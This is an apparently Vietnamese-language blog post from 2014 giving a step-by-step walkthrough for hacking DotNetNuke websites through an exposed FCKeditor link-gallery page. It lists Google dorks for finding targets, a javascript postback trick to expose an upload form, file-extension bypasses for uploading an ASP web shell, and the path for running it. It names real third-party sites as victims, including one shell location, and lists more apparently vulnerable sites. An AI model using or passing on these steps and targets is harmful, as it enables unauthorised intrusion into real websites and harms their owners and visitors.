Tuesday, June 3, 2014

Demo Hack Web Bằng Kỹ Thuật DNN (DotNet Nuke)



Bước 1: Sử dụng google để tìm site chứa lỗhổng DNN

:inurl:/tabid/36/language/en-US/Default.aspx
Inurl:”/portals/0” 

Bước 2: Chọn  1 victim bất kỳ, ví dụ:

http://www.citedelajoiehaiti.org/tabid/36/language/vi-VN/Default.aspx

Bước 3: Thay thế đoạn urlsau:

/tabid/36/language/en-US/Default.aspx
Bằng đoạn mã url:
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Lúc đó, đường link của victimnhư sau:
http://www.citedelajoiehaiti.org/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Thông tin thu được:



 

Bước 4: Tích vào File (A File on your site)

      

Sau đó thay thế đường link  bằng đoạn mã Script đơn giản sau:
javascript:__doPostBack('ctlURL$cmdUpload','') 

Sau khi chạy địa chỉ url ở trên sẽ xuất hiện giao diện cho upload file

Bước 5: Uploadshell
Click Browse và upload shell.asp or. aspx 




Thêm 1 số kỹ thuậtupload shell đối với asp,
- Có thể bypass đuôifile shell sang dạng ảnh như sau: shell.asp;.jpg.
- Hoặc sử dụngtool http live herder or tamper data….

Bước 6: Runshell

Path đường dẫnđể http://www.victim.com.vn//portals/0/tên shell
Ví dụ: http://www.citedelajoiehaiti.org/portals/0/soleil.asp


 


Một số site dính DNN:

http://www.gydykla.lt/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
http://www.rotel.ch/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
http://southeastasiansea.net/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
http://www.guideassociation.org/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
http://www.yorkbest.info/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
http://www.gesunderlifestyle.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
http://www.seth.pt/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)